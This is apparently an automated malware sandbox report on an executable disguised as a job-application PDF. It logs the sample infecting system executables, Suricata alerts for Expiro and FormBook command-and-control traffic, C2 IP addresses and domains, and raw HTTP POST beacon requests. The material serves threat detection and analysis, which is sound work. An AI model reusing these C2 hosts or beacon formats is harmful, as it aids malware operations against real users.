            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7z.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe System file written: C:\Windows\System32\AppVClient.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\SysWOW64\perfhost.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7zG.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\msiexec.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\VSSVC.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbengine.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\SearchIndexer.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\TieringEngineService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\AgentService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\FXSSVC.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\sppsvc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\SensorDataService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\msdtc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

            Networking

            Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:60973 -> 1.1.1.1:53
            Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:61460 -> 1.1.1.1:53
            Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49720 -> 52.11.240.239:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53933 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53973 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:53962 -> 13.213.51.196:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53932 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53936 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53936 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53950 -> 199.59.243.160:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53957 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53950 -> 199.59.243.160:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53967 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53967 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53960 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54010 -> 37.27.60.109:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53934 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54018 -> 37.27.60.109:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54024 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54027 -> 203.161.60.161:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53922 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53922 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53947 -> 199.59.243.160:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53941 -> 199.59.243.160:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53943 -> 199.59.243.160:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53992 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:54003 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:54003 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:63550 -> 1.1.1.1:53
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53985 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53985 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:54026 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:54026 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53964 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54029 -> 203.161.60.161:80
            Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:54005 -> 13.213.51.196:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53982 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:54030 -> 203.161.60.161:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:54030 -> 203.161.60.161:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54023 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53995 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:54022 -> 37.27.60.109:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:54022 -> 37.27.60.109:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53997 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53977 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54025 -> 13.248.169.48:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54028 -> 203.161.60.161:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54014 -> 37.27.60.109:80
            Source: DNS query: www.minimalbtc.xyz
            Source: DNS query: www.dappbtc.xyz
            Source: DNS query: www.stakemask.xyz
            Source: DNS query: www.agistaking.xyz
            Source: DNS query: www.publicblockchain.xyz
            Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
            Source: unknown Network traffic detected: DNS query count 84
            Source: global traffic TCP traffic: 192.168.2.4:53917 -> 162.159.36.2:53
            Source: Joe Sandbox View IP Address: 165.160.15.20
            Source: Joe Sandbox View IP Address: 13.248.169.48
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.214.183.61:80 -> 192.168.2.4:53938
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.214.183.61:80 -> 192.168.2.4:53938
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.4:49728
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.4:49728
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.4:53978
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.4:53978
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.4:49723
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.4:49724
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.4:49724
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.4:49723
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.4:53946
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.4:53946
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.4:53980
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.4:53945
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.4:53945
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.4:53980
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.4:53953
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.4:53953
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.4:53983
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.4:53983
            Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:53989
            Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:53989
            Source: global traffic HTTP traffic detected: POST /idtdeni HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 862
            Source: global traffic HTTP traffic detected: POST /ktxpmbh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /egxe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 862
            Source: global traffic HTTP traffic detected: POST /wd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /savevus HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /d HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /ehgyq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /gymegolihltgvcqo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: GET /gymegolihltgvcqo?usid=24&utid=11154195932 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.przvgke.biz
            Source: global traffic HTTP traffic detected: POST /aosibypyx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
